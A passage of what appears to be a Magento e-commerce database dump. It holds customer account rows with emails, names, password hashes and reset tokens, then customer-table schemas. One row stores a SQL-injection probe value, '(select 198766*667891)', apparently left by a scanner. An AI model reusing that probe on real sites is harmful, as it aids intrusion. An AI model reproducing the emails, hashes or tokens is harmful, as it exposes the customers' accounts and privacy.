(99, 1, 'alikee53616@5dub.lolcorp.online', 1, NULL, 1, '2024-06-17 01:57:45', '2024-06-17 01:57:49', 1, 0, 'Default Store View', NULL, 'Ivan', NULL, 'Gamaz', NULL, NULL, '00e0807582a8b3c411010f5c1778909b5169e484a3faa6e55ee23690fbd214a0:SKa6m3YEFPc78EJH:2', 'q9ybBVkgHjhjyDotqoQpqn7xP4ZFjYzU', '2024-06-17 01:57:49', NULL, NULL, NULL, NULL, NULL, 0, NULL, NULL),
(100, 1, 'doris_nugentmeds@outlook.com', 1, NULL, 1, '2024-09-17 12:18:05', '2024-09-17 12:19:45', 1, 0, 'Default Store View', NULL, 'kKTWYkogiil', NULL, 'MGEnstoAiw', NULL, NULL, '18fb29cc5de81325c30cdd02c6c93a2e4de07a118d1e1361c73b9c5092f5c98a:EWIx6KPqo2AKRFjK:2', 'qVyh48Ys4ljZfdVnIbBk2JxZzU0ncTN6', '2024-09-17 12:18:07', NULL, NULL, NULL, NULL, NULL, 4, '2024-09-17 12:18:43', NULL),
(101, 1, 'joyce30compon06@outlook.com', 1, NULL, 1, '2024-09-22 17:27:36', '2024-09-22 17:29:26', 1, 0, 'Default Store View', NULL, 'EDQYtkBwbdqtAc', NULL, 'PnXauvedTjvO', NULL, NULL, '848ea12e7177544e776d554b3e69c33c54d3f3a3d4d36984b5a6836588ed1773:h4GzvEyhqOVGQA8m:2', '1RG3i70ytKu4rWM83ub6LPjf4FJSnzw8', '2024-09-22 17:27:38', NULL, NULL, NULL, NULL, NULL, 5, '2024-09-22 17:28:10', NULL),
(102, 1, 'alileasm@gmail.com', 1, NULL, 1, '2024-09-28 19:21:15', '2024-09-28 19:22:34', 1, 0, 'Default Store View', NULL, 'DqrUWxryKwyN', NULL, 'LZfiXbwWVob', NULL, NULL, '18f9b86c851940d5d733abe29ad36d16e04e611f2303928ed14599d28b8415eb:RvZ7xqLNGbs4DBGr:2', '3E3bJJfDdUjBRNOMBjr8KNuOpo8WYiIk', '2024-09-28 19:21:17', NULL, NULL, NULL, NULL, NULL, 5, '2024-09-28 19:21:42', NULL),
(103, 1, 'cofcgirl101@yahoo.com', 1, NULL, 1, '2024-10-01 09:48:05', '2024-10-01 09:49:16', 1, 0, 'Default Store View', NULL, 'jXdIqrET', NULL, 'vxfukYXpWuwPSbf', NULL, NULL, '6a7aeb64aa3a96830af77e48436a255334bf99754264a1e95346e8a692f4e96d:4f8lLEJaVXXmUCoQ:2', 'tMcM7PXrB4Wa8JkJllU3YcoFwPwRAGC9', '2024-10-01 09:48:06', NULL, NULL, NULL, NULL, NULL, 3, '2024-10-01 09:48:39', NULL),
(104, 1, 'steelesimfoniyax8834@gmail.com', 1, NULL, 1, '2024-10-18 10:25:02', '2024-10-18 10:25:04', 1, 0, 'Default Store View', NULL, 'mHqRgkkGdDMAPks', NULL, 'xPCYMANwT', NULL, NULL, 'bdac6e928e8a51a6fe665dec62e4bc53c4982ac86b54d288e38f185b0a5dfe4f:Y74zPDLJyPPiiP4d:2', 'dxN9WL5QYLOgtvuKWwAeN92DIhkPpczW', '2024-10-18 10:25:04', NULL, NULL, NULL, NULL, NULL, 0, NULL, NULL),
(105, 1, 'kassiaanu31@gmail.com', 1, NULL, 1, '2024-10-21 19:10:23', '2024-10-21 19:10:25', 1, 0, 'Default Store View', NULL, 'TFPhpytCELaaz', NULL, 'MrwASwPD', NULL, NULL, '31ac0598510fe26229f40f6646d3d401fb1988cf00e22eed9ca33492ecee6a0e:oxjxOsjAFMzAD4kK:2', '2VlzVpRLuoULhga9PiJdSfXSm5ubTP0O', '2024-10-21 19:10:25', NULL, NULL, NULL, NULL, NULL, 0, NULL, NULL),
(106, 1, 'sanngravesz7143@gmail.com', 1, NULL, 1, '2024-10-26 02:34:14', '2024-10-26 02:34:16', 1, 0, 'Default Store View', NULL, 'nAjZmuYYlv', NULL, 'ZweLkcDnpu', NULL, NULL, '8cae66d32dee3ba83b1db79e6865d5047aa5b6d68db2b4a8fb70677302ea6cbb:zAQab452SZvOYn9h:2', 'mtHDEzo9iPtQSnNSvj82nfrt9bIEOU0u', '2024-10-26 02:34:16', NULL, NULL, NULL, NULL, NULL, 0, NULL, NULL),
(107, 1, 'wvvvferijxmff@yahoo.com', 1, NULL, 1, '2024-11-04 11:58:32', '2024-11-04 11:58:34', 1, 0, 'Default Store View', NULL, 'HOSsIHHNLFtXUa', NULL, 'GxqRtAjmmUUtGE', NULL, NULL, '172103d30adf527c28e7d73fc01609c67ce40e0d7a41ea779544f24ee533aa05:tBDeTg8Cxse1zSV1:2', 'ciS5Gs2VWfxZQG9QDOtZYK7zsfA3RIEf', '2024-11-04 11:58:34', NULL, NULL, NULL, NULL, NULL, 0, NULL, NULL),
(108, 1, 'wores42102@gianes.com', 1, NULL, 1, '2024-11-17 09:57:17', '2024-11-17 09:57:18', 1, 0, 'Default Store View', NULL, 'asd', NULL, 'ads', NULL, NULL, '999bf371831085c87d02044b3284bf153bfda6ebb75e6ddca8a3885d4624f229:VcsrHUMRgnlnxnYr:2', 'N0NlD72Ima2TLBVJcbt2velhhMHXzOwV', '2024-11-17 09:57:18', NULL, NULL, NULL, NULL, NULL, 0, NULL, NULL),
(109, 1, 'kssspatel@outlook.com', 1, NULL, 1, '2024-12-10 10:26:57', '2024-12-10 10:26:58', 1, 0, 'Default Store View', 'MS', 'Aprin', NULL, 'Bacames', 'D', '1980-01-01', '895cd2359002a10b2286a9de7640fd3768865efbb6544302d537f31c0eafab1f:GNn8w0adQJMzAEfS:2', 'vbyMdYvIPGD9ie6L4qVHtVUTCsE0ffva', '2024-12-10 10:26:58', NULL, NULL, '2', NULL, 2, 0, NULL, NULL),
(110, 1, 'hotoxo5768@numerobo.com', 1, NULL, 1, '2025-02-05 11:09:12', '2025-02-05 11:09:13', 1, 0, 'Default Store View', NULL, 'jig', NULL, 'jdf', NULL, NULL, '76f7678e7e4cc623bf9477d4447e6773f88fa2c076a52aa3f35339cfec00526f:AlSX6wQeszXHgUni:2', 'cyiKtRFgJlbDrCfsTxgvKKB46BNZxT7l', '2025-02-05 11:09:13', NULL, NULL, NULL, NULL, NULL, 0, NULL, NULL),
(111, 1, 'lnjybaho@do-not-respond.me', 1, NULL, 1, '2025-02-28 19:58:23', '2025-02-28 19:58:25', 1, 0, 'Default Store View', NULL, 'John', NULL, 'John', NULL, NULL, 'ba8a6c5832f66dad7091639b2d049ca88617253b2a06c0cbfdabf6712f35e8eb:IEVKoew541TZc1lf:2', 'a8xeZYww71dSkQZvzuIKRFVZKW0OFHUB', '2025-02-28 19:58:25', NULL, NULL, NULL, NULL, NULL, 0, NULL, NULL),
(112, 1, 'bjzqwamq@formtest.guru', 1, NULL, 1, '2025-05-23 12:20:06', '2025-05-23 12:20:09', 1, 0, 'Default Store View', NULL, 'Hello', NULL, 'TestUser', NULL, NULL, 'e987db506d515fe0821bd733534a8348437d01880bddb66711d578ccdf568fec:uwCnrhJCqMdjLBg9:2', 'rZKTmGq3re89X4aXGWTIw8szc534SoKz', '2025-05-23 12:20:09', NULL, NULL, NULL, NULL, NULL, 0, NULL, NULL),
(113, 1, 'mikesdrums@aol.com', 1, NULL, 1, '2025-07-02 22:24:26', '2025-07-02 22:24:28', 1, 0, 'Default Store View', NULL, 'Hannah', NULL, 'Shannon', NULL, NULL, '6f3d8a144af86024a274732f244354196242eb23447f023dfad78579fbb1f23d:Lr5TzqkErlGjcDWI:2', '7U3wfuva7muR6QfRloYjWPTWVBo5j4kV', '2025-07-02 22:24:28', NULL, NULL, NULL, NULL, NULL, 0, NULL, NULL),
(114, 1, 'arleendoug12@gmail.com', 1, NULL, 1, '2025-07-04 22:00:59', '2025-07-04 22:01:01', 1, 0, 'Default Store View', NULL, 'Claudia', NULL, 'Semmens', NULL, NULL, '229d2851adec4a3dfcbaa29a5127f64b4f4211fede4fa7496f7a71310bc08907:ouKhn8e8pVVBX1JA:2', 'NeOTgHqcdxp3tloQcib8YcTGe5gF8IsT', '2025-07-04 22:01:01', NULL, NULL, NULL, NULL, NULL, 0, NULL, NULL),
(115, 1, 'carbonaracapibara87@outlook.com', 1, NULL, 1, '2025-11-14 21:26:33', '2025-11-14 21:26:34', 1, 0, 'Default Store View', NULL, 'Braian', NULL, 'Ashley', NULL, NULL, '9ede9549aabaa3aa1c77fb492233214f997daf0104282407e26baab9566c5eb4:17sX1X9h3wuj0PS4:2', 'Rh1Gplcc9s5tsClN14OdQ5ulN2GPKY0l', '2025-11-14 21:26:34', NULL, NULL, NULL, NULL, NULL, 0, NULL, NULL),
(116, 1, 'testing@example.com', 1, NULL, 1, '2026-01-02 07:01:15', '2026-01-02 07:42:09', 1, 0, 'Default Store View', '317', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '(select 198766*667891)', '1967-01-01', '161745f5ef8562cd83aedbc1e8d1dfef237595beed5ca915825ae195e09948c2:RBeVB9LIki9TvIYM:2', 'XNVStMOIyZN9CHJp7z2NUIiEMuEmPGxM', '2026-01-02 07:01:16', 291, 291, '2023-03-22T15:34:00Z', NULL, 1, 0, NULL, NULL),
(117, 1, 'testing@example.comAv3zbKMi', 1, NULL, 1, '2026-01-02 07:14:57', '2026-01-02 07:14:57', 1, 0, 'Default Store View', '317', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '1', '1967-01-01', 'd10ab5b2fbc31eba0547dc32dd5a42cbfee79ff732d865f9093cdcea90b42513:LyUTwdIZ73IxoePy:2', 'YxTqJrfiXP2o4w45eemgtcz4A0jhJhH8', '2026-01-02 07:14:57', NULL, NULL, '2023-03-22T15:34:00Z', NULL, 1, 0, NULL, NULL),
(118, 1, 'xadeyaja181@gmail.com', 1, NULL, 1, '2026-01-03 11:04:14', '2026-01-03 11:04:15', 1, 0, 'Default Store View', NULL, 'fKGRargthWozcAOjSeKfV', NULL, 'UEJfcIwuKagcifpIVeeHmv', NULL, NULL, '0b5ef96708f569ee5b5db09f6f594d5101b34f5a85effc5fc12cecde36cf0a72:Sg3yI57KqMg54DEI:2', 'P10Qka72oigJ9KqTAaQWZCgsZm70HhS2', '2026-01-03 11:04:15', NULL, NULL, NULL, NULL, NULL, 0, NULL, NULL),
(119, 1, 'ib.ih.as.eq.aj.e.0.6.7@gmail.com', 1, NULL, 1, '2026-01-07 23:06:33', '2026-01-07 23:06:35', 1, 0, 'Default Store View', NULL, 'olBslTmTvzLSBlriS', NULL, 'YDEAhyKzJiDMuYpJlvC', NULL, NULL, '1919a3ee1f748525b8a788a81d3045c9fdde3d4c71b0bce2678912f4ff7c3a74:tHqnmsiMFwmyvOiZ:2', 'JnPBnIvpQgmxMbOtGbAyQ2ruI4c5CcjD', '2026-01-07 23:06:35', NULL, NULL, NULL, NULL, NULL, 0, NULL, NULL),
(120, 1, 'fi.yi.v.e.cu.65@gmail.com', 1, NULL, 1, '2026-01-08 10:42:35', '2026-01-08 10:42:36', 1, 0, 'Default Store View', NULL, 'ldyvCRwlkiLHsmoBvmJiVad', NULL, 'sawyRPVcvQnWkmaAHmIrq', NULL, NULL, '573211eec274491e31efef00e44188a62d55dc27c8e3c85f98bb6e4d16dc61aa:FjQiGRKWuxKszrVu:2', '5P61hwKnawDIsHaZH963UgNQtdG5JAkv', '2026-01-08 10:42:36', NULL, NULL, NULL, NULL, NULL, 0, NULL, NULL),
(121, 1, 'iqe.c.i.ya.li.k.o80.6@gmail.com', 1, NULL, 1, '2026-01-11 16:07:07', '2026-01-11 16:07:08', 1, 0, 'Default Store View', NULL, 'JvWiOsMSgIoWVjPVWUT', NULL, 'EKaNuPAyZMkYjVArrjouUytd', NULL, NULL, 'c8c38fbc7415b9aa76eae539120035bc27e8e3559d6b135459fd8538c9abc9ad:3FCy5KvfGAQGAZhM:2', 'eMkMoY4wgUH76hkB1kFwNE9pz4GoEdgy', '2026-01-11 16:07:08', NULL, NULL, NULL, NULL, NULL, 0, NULL, NULL),
(122, 1, 'op.oy.im.o.baxe.h86@gmail.com', 1, NULL, 1, '2026-01-13 15:18:22', '2026-01-13 15:18:23', 1, 0, 'Default Store View', NULL, 'wGfDUvkPqSfxRHrcSSDgeIM', NULL, 'nsUudcodvszhlvjrmOIm', NULL, NULL, '161ce7cf308cf98d8912774ec406afd066d72abaa0bdddb3c23efdb08bf718b1:4FVK9Z5LOTHUo8UA:2', 'WcnLr5NtbzcXHrdULKSjBiybNG8Z2VjT', '2026-01-13 15:18:23', NULL, NULL, NULL, NULL, NULL, 0, NULL, NULL),
(123, 1, 'ca.b.u.d.a.fa.d.u.m5.9.9@gmail.com', 1, NULL, 1, '2026-02-02 11:23:23', '2026-02-02 11:23:25', 1, 0, 'Default Store View', NULL, 'QuMCXMJQFMzqcilHyJYyDbpl', NULL, 'dDFzDoGqCdHqNQyGYPPjfl', NULL, NULL, '832373798e512e7f50011a2016bae28ded48fdf39dc1ffe1c162dc28f7842863:hHWut5Kfmn73596s:2', 'G9K4o7znF0iUqpDrKNenBJDJpdUd7cie', '2026-02-02 11:23:25', NULL, NULL, NULL, NULL, NULL, 0, NULL, NULL),
(124, 1, 'i.dib.uq.uf.i.y.i.27.2@gmail.com', 1, NULL, 1, '2026-02-05 11:11:10', '2026-02-05 11:11:11', 1, 0, 'Default Store View', NULL, 'RQttarDyZzENEgXt', NULL, 'llWlXHKOkCXbpioQfPgitZX', NULL, NULL, 'bbd1839dba101edb520853f54e46c668c242a58590b8fab775f83064fab5b4e6:Xd1i4hkROdaweejJ:2', 'XsNc0gswcc3YOC9YSTKOgDGPobUx91dN', '2026-02-05 11:11:11', NULL, NULL, NULL, NULL, NULL, 0, NULL, NULL),
(125, 1, 'pum.eba.h.ezi.z.i0.8@gmail.com', 1, NULL, 1, '2026-02-22 14:24:10', '2026-02-22 14:24:10', 1, 0, 'Default Store View', NULL, 'flaawHfQACgaGlwsTPCCoNvd', NULL, 'kwRVUMNQlgQosBSHQ', NULL, NULL, 'f1163d8010905689be2b3bab164ac8814622b6de930732f61d4a85464c7aebd3:w8uru9ot1lZVMBQC:2', 'OAAc9eSwjzlAQJBZ5VwNyQ1QgPJX65oV', '2026-02-22 14:24:10', NULL, NULL, NULL, NULL, NULL, 0, NULL, NULL),
(126, 1, 'j.id.a.xukas.as.1.15@gmail.com', 1, NULL, 1, '2026-02-27 06:07:52', '2026-02-27 06:08:53', 1, 0, 'Default Store View', NULL, 'YAnAHhebXAmapUnTPy', NULL, 'TRqjqKihxTbBfpcGSdOfQruC', NULL, NULL, '5b50ba900289975f19df901704c125df87865923eacb4f21441f136d63d785fc:jV4CUZW37HiRcldv:2', '293R07oSEAQJqFHNJAKkgT73yKabUtHu', '2026-02-27 06:07:53', NULL, NULL, NULL, NULL, NULL, 4, '2026-02-27 06:08:32', NULL),
(127, 1, 'se.y.oj.ere.6.87@gmail.com', 1, NULL, 1, '2026-03-02 01:55:44', '2026-03-02 01:55:45', 1, 0, 'Default Store View', NULL, 'GnscdFEovnXxJZuBHniL', NULL, 'HyOeUzubdoWwCwasfiG', NULL, NULL, 'cfcae5fc64df36fbb56c6e5581629c9051d0ca6464f007a03c41c92cd8ee7c23:KCPInkJb301AlKm3:2', 'CcFxJwk7cqEsK5xIXDHakjHZsIrR8l6R', '2026-03-02 01:55:45', NULL, NULL, NULL, NULL, NULL, 0, NULL, NULL),
(128, 1, 'em.u.vo.s.esexu.k58@gmail.com', 1, NULL, 1, '2026-03-10 06:54:22', '2026-03-10 06:54:24', 1, 0, 'Default Store View', NULL, 'WzaNATCgQhnryDXwCtEFtV', NULL, 'fheWCaoRHWemHBNWuqNDJr', NULL, NULL, '10a1405f64bd67eff5873834bf9ce2125b99fd05d0991205155bf78e1c323f6c:QjCz725SlEY3BEZG:2', 'LG1VCgq36ix5fWXjh5g3plG9rwQ2F7Er', '2026-03-10 06:54:24', NULL, NULL, NULL, NULL, NULL, 0, NULL, NULL),
(129, 1, 'h.o.fa.f.u.p.a.r.7.8@gmail.com', 1, NULL, 1, '2026-03-12 21:19:18', '2026-03-12 21:19:19', 1, 0, 'Default Store View', NULL, 'wcijRJrzklRWrrvsQtNr', NULL, 'CNsZwbfPSviiqVlZ', NULL, NULL, '630758eac7352cc14b2cb2cc1d43a4245ac5947bb527427b25d909dee2d6b03c:Q57YuoJ3kOpjBrrj:2', 'eexMfKq2l6hLzyeMF9njwbU81xcNxW09', '2026-03-12 21:19:19', NULL, NULL, NULL, NULL, NULL, 0, NULL, NULL),
(130, 1, 'o.seme.j.u.z.i.0.8@gmail.com', 1, NULL, 1, '2026-03-27 17:53:04', '2026-03-27 17:53:05', 1, 0, 'Default Store View', NULL, 'aJpTXDrmzKqdbbIbfBdlvUao', NULL, 'ZCjGpoNRyWdtFkwepg', NULL, NULL, 'ddac52469cf6ce02f698f01cb0eff2c9fe9b2883e4382dc5d1547c3cbd1df871:Ik6ktuvqvTQkyl1v:2', 'OXbFMQ7iBslQ7lisWEDPtMMvSccz9PFk', '2026-03-27 17:53:05', NULL, NULL, NULL, NULL, NULL, 0, NULL, NULL);
INSERT INTO `customer_entity` (`entity_id`, `website_id`, `email`, `group_id`, `increment_id`, `store_id`, `created_at`, `updated_at`, `is_active`, `disable_auto_group_change`, `created_in`, `prefix`, `firstname`, `middlename`, `lastname`, `suffix`, `dob`, `password_hash`, `rp_token`, `rp_token_created_at`, `default_billing`, `default_shipping`, `taxvat`, `confirmation`, `gender`, `failures_num`, `first_failure`, `lock_expires`) VALUES
(131, 1, 'i.g.ut.e.liva8.2@gmail.com', 1, NULL, 1, '2026-03-28 09:04:04', '2026-03-28 09:04:05', 1, 0, 'Default Store View', NULL, 'AJmyOjofCXSEwapIB', NULL, 'qkFThLFbkAojVvazISESvyp', NULL, NULL, 'dbd3e2fab921030d40694c2a0b0d1469b59f1b907ac9125d994a26ace648c2c7:7yOeo6tqWknqSXpm:2', '56NAmAQzbExEUlH6RXGzSzh3FZQubrIS', '2026-03-28 09:04:05', NULL, NULL, NULL, NULL, NULL, 0, NULL, NULL),
(132, 1, 'uq.o.h.ah.i.hejo45@gmail.com', 1, NULL, 1, '2026-04-09 14:21:40', '2026-04-09 14:21:41', 1, 0, 'Default Store View', NULL, 'vGwUoAeBSyetAkcCeNQol', NULL, 'ZdXOyZUxywvBsPpqCpqmY', NULL, NULL, '1c31e980e37daf2100d5ea5249934dc10db1aa9e41fc7a1473236ad4e78d2e55:1WfajYiBDyJ8E1DJ:2', 'Of3OqyrBmjZbMy6LAekLAQBGUx8iUvG0', '2026-04-09 14:21:41', NULL, NULL, NULL, NULL, NULL, 0, NULL, NULL),
(133, 1, 'uloxu.h.esuj.i.b.45@gmail.com', 1, NULL, 1, '2026-04-10 17:29:15', '2026-04-10 17:29:16', 1, 0, 'Default Store View', NULL, 'sDYWbzxJUrWKdIjl', NULL, 'PIfdDCNqHBeRJeOPCwQSf', NULL, NULL, '2ab1a60bcc3209fffaf002b887ff1a1b42f4a962b81db65cafcf202e8018434e:BGSnnTBQfkwxgF62:2', 'oLjl0nb0YGUQ3H4S25AxRvA173bc8vQa', '2026-04-10 17:29:16', NULL, NULL, NULL, NULL, NULL, 0, NULL, NULL),
(134, 1, 'r.o.c.u.ye.x.u.y559@gmail.com', 1, NULL, 1, '2026-04-18 13:35:36', '2026-04-18 13:35:37', 1, 0, 'Default Store View', NULL, 'CaxjBqmIRIGhEiGuNbXOPUp', NULL, 'xqZFrjHSRTBLNDBuxGjAVrL', NULL, NULL, '4e515b1cf1861ba0485da0e1530357d4287986ae6a77800fcf3304fdd42f8407:4hADdThMEwBaqnq7:2', 'TaNCi6hnOvnDU0m8gfuCJQrN4EVCxgqZ', '2026-04-18 13:35:37', NULL, NULL, NULL, NULL, NULL, 0, NULL, NULL),
(135, 1, 'm.ohu.qu.b.4.1.1@gmail.com', 1, NULL, 1, '2026-04-21 14:27:25', '2026-04-21 14:27:26', 1, 0, 'Default Store View', NULL, 'xmWoevRAgatyDfGZnxhYh', NULL, 'pprBYaPwhTTzdJtyMxE', NULL, NULL, 'a3ebeb3bce71c8ebbb0d5846f5f9d2d3f80888a794221aafd064ee903f8e33ba:mcPtC1vaSKJqZHQi:2', 'c2pvc8r5HMsahTEljkT9cWGRywGaE7Zm', '2026-04-21 14:27:26', NULL, NULL, NULL, NULL, NULL, 0, NULL, NULL),
(136, 1, 'c.ahu.wu.zog.a.w0.4@gmail.com', 1, NULL, 1, '2026-04-28 00:13:21', '2026-04-28 00:13:23', 1, 0, 'Default Store View', NULL, 'CNmvgaxbAQXuSDGMHXdKjfAZ', NULL, 'gUskOIzxSXRbvQGSTcCXvtY', NULL, NULL, '8936fcca1516e2740397e5b9b43f8c4fa8f322a1f1d12d69c5d13c0582f7688e:EEBcHnYcr7VcDI6Z:2', '9iKY5YATERS24AhlFBnTyvH9HbkVjVJe', '2026-04-28 00:13:23', NULL, NULL, NULL, NULL, NULL, 0, NULL, NULL),
(137, 1, 'e.ko.y.ijavux.uk2.8@gmail.com', 1, NULL, 1, '2026-04-30 04:11:24', '2026-04-30 04:11:25', 1, 0, 'Default Store View', NULL, 'faEbkkJDrzlDlhkkkPSQc', NULL, 'QNCxctlFQveQWTTZew', NULL, NULL, 'd3627e8f8465bfa494c7321156a3a0ede2393d49a6529535d62f2f92a2020bc2:CB5QezhwoS5uMVOh:2', 'OSYXoaZqVDniIOO7SmRnJqoqWNAUXLBx', '2026-04-30 04:11:25', NULL, NULL, NULL, NULL, NULL, 0, NULL, NULL),
(138, 1, 'g.o.q.uqu.y.447@gmail.com', 1, NULL, 1, '2026-04-30 22:07:25', '2026-04-30 22:08:23', 1, 0, 'Default Store View', NULL, 'SPGhxmNfkNuSymqAdjEtszNH', NULL, 'ynShzhhrmODTJvjM', NULL, NULL, '2600ca07dc82a550bab1e979dd1eb22e95f8523493cfb22002511315fc26f322:eFnM2YHzYqFyQCYj:2', 'iMBWoU7ZIcBQSjtyc6Ok8ZQLCMLbYehH', '2026-04-30 22:07:37', NULL, NULL, NULL, NULL, NULL, 1, '2026-04-30 22:08:22', NULL);

-- --------------------------------------------------------

--
-- Table structure for table `customer_entity_datetime`
--

CREATE TABLE `customer_entity_datetime` (
  `value_id` int(11) NOT NULL COMMENT 'Value ID',
  `attribute_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Attribute ID',
  `entity_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Entity ID',
  `value` datetime DEFAULT NULL COMMENT 'Value'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Customer Entity Datetime';

-- --------------------------------------------------------

--
-- Table structure for table `customer_entity_decimal`
--

CREATE TABLE `customer_entity_decimal` (
  `value_id` int(11) NOT NULL COMMENT 'Value ID',
  `attribute_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Attribute ID',
  `entity_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Entity ID',
  `value` decimal(12,4) NOT NULL DEFAULT 0.0000 COMMENT 'Value'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Customer Entity Decimal';

-- --------------------------------------------------------

--
-- Table structure for table `customer_entity_int`
--

CREATE TABLE `customer_entity_int` (
  `value_id` int(11) NOT NULL COMMENT 'Value ID',
  `attribute_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Attribute ID',
  `entity_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Entity ID',
  `value` int(11) NOT NULL DEFAULT 0 COMMENT 'Value'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Customer Entity Int';

-- --------------------------------------------------------

--
-- Table structure for table `customer_entity_text`
--

CREATE TABLE `customer_entity_text` (
  `value_id` int(11) NOT NULL COMMENT 'Value ID',
  `attribute_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Attribute ID',
  `entity_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Entity ID',
  `value` text NOT NULL COMMENT 'Value'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Customer Entity Text';

-- --------------------------------------------------------

--
-- Table structure for table `customer_entity_varchar`
--

CREATE TABLE `customer_entity_varchar` (
  `value_id` int(11) NOT NULL COMMENT 'Value ID',
  `attribute_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Attribute ID',
  `entity_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Entity ID',
  `value` varchar(255) DEFAULT NULL COMMENT 'Value'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Customer Entity Varchar';

-- --------------------------------------------------------

--
-- Table structure for table `customer_form_attribute`
--

CREATE TABLE `customer_form_attribute` (
  `form_code` varchar(32) NOT NULL COMMENT 'Form Code',
  `attribute_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Attribute ID'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Customer Form Attribute';

--
-- Dumping data for table `customer_form_attribute`
--

INSERT INTO `customer_form_attribute` (`form_code`, `attribute_id`) VALUES
('adminhtml_checkout', 9),
('adminhtml_checkout', 10),
('adminhtml_checkout', 11),
('adminhtml_checkout', 17),
('adminhtml_checkout', 20),
('adminhtml_customer', 1),
('adminhtml_customer', 3),
('adminhtml_customer', 4),
('adminhtml_customer', 5),
('adminhtml_customer', 6),
('adminhtml_customer', 7),
('adminhtml_customer', 8),
('adminhtml_customer', 9),
('adminhtml_customer', 10),
('adminhtml_customer', 11),
('adminhtml_customer', 17),
('adminhtml_customer', 19),
('adminhtml_customer', 20),
('adminhtml_customer', 21),
('adminhtml_customer_address', 22),
('adminhtml_customer_address', 23),
('adminhtml_customer_address', 24),
('adminhtml_customer_address', 25),
('adminhtml_customer_address', 26),
('adminhtml_customer_address', 27),
('adminhtml_customer_address', 28),
('adminhtml_customer_address', 29),
('adminhtml_customer_address', 30),
('adminhtml_customer_address', 31),
('adminhtml_customer_address', 32),
('adminhtml_customer_address', 33),
('adminhtml_customer_address', 34),
('adminhtml_customer_address', 35),
('adminhtml_customer_address', 36),
('customer_account_create', 4),
('customer_account_create', 5),
('customer_account_create', 6),
('customer_account_create', 7),
('customer_account_create', 8),
('customer_account_create', 9),
('customer_account_create', 11),
('customer_account_create', 17),
('customer_account_create', 19),
('customer_account_create', 20),
('customer_account_edit', 4),
('customer_account_edit', 5),
('customer_account_edit', 6),
('customer_account_edit', 7),
('customer_account_edit', 8),
('customer_account_edit', 9),
('customer_account_edit', 11),
('customer_account_edit', 17),
('customer_account_edit', 19),
('customer_account_edit', 20),
('customer_address_edit', 22),
('customer_address_edit', 23),
('customer_address_edit', 24),
('customer_address_edit', 25),
('customer_address_edit', 26),
('customer_address_edit', 27),
('customer_address_edit', 28),
('customer_address_edit', 29),
('customer_address_edit', 30),
('customer_address_edit', 31),
('customer_address_edit', 32),
('customer_address_edit', 33),
('customer_address_edit', 34),
('customer_address_edit', 35),
('customer_address_edit', 36),
('customer_register_address', 22),
('customer_register_address', 23),
('customer_register_address', 24),
('customer_register_address', 25),
('customer_register_address', 26),
('customer_register_address', 27),
('customer_register_address', 28),
('customer_register_address', 29),
('customer_register_address', 30),
('customer_register_address', 31),
('customer_register_address', 32),
('customer_register_address', 33),
('customer_register_address', 34),
('customer_register_address', 35),
('customer_register_address', 36);

-- --------------------------------------------------------

--
-- Table structure for table `customer_grid_flat`
--

CREATE TABLE `customer_grid_flat` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `name` text DEFAULT NULL COMMENT 'Name',
  `email` varchar(255) DEFAULT NULL COMMENT 'Email',
  `group_id` int(11) DEFAULT NULL COMMENT 'Group_id',
  `created_at` timestamp NULL DEFAULT NULL COMMENT 'Created_at',
  `website_id` int(11) DEFAULT NULL COMMENT 'Website_id',
  `confirmation` varchar(255) DEFAULT NULL COMMENT 'Confirmation',
  `created_in` text DEFAULT NULL COMMENT 'Created_in',
  `dob` date DEFAULT NULL COMMENT 'Dob',
  `gender` int(11) DEFAULT NULL COMMENT 'Gender',
  `taxvat` varchar(255) DEFAULT NULL COMMENT 'Taxvat',
  `lock_expires` timestamp NULL DEFAULT NULL COMMENT 'Lock_expires',
  `shipping_full` text DEFAULT NULL COMMENT 'Shipping_full',
  `billing_full` text DEFAULT NULL COMMENT 'Billing_full',
  `billing_firstname` varchar(255) DEFAULT NULL COMMENT 'Billing_firstname',
  `billing_lastname` varchar(255) DEFAULT NULL COMMENT 'Billing_lastname',
  `billing_telephone` varchar(255) DEFAULT NULL COMMENT 'Billing_telephone',
  `billing_postcode` varchar(255) DEFAULT NULL COMMENT 'Billing_postcode',
  `billing_country_id` varchar(255) DEFAULT NULL COMMENT 'Billing_country_id',
  `billing_region` varchar(255) DEFAULT NULL COMMENT 'Billing_region',
  `billing_street` varchar(255) DEFAULT NULL COMMENT 'Billing_street',
  `billing_city` varchar(255) DEFAULT NULL COMMENT 'Billing_city',
  `billing_fax` varchar(255) DEFAULT NULL COMMENT 'Billing_fax',
  `billing_vat_id` varchar(255) DEFAULT NULL COMMENT 'Billing_vat_id',
  `billing_company` varchar(255) DEFAULT NULL COMMENT 'Billing_company'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='customer_grid_flat';

--
-- Dumping data for table `customer_grid_flat`
--

INSERT INTO `customer_grid_flat` (`entity_id`, `name`, `email`, `group_id`, `created_at`, `website_id`, `confirmation`, `created_in`, `dob`, `gender`, `taxvat`, `lock_expires`, `shipping_full`, `billing_full`, `billing_firstname`, `billing_lastname`, `billing_telephone`, `billing_postcode`, `billing_country_id`, `billing_region`, `billing_street`, `billing_city`, `billing_fax`, `billing_vat_id`, `billing_company`) VALUES
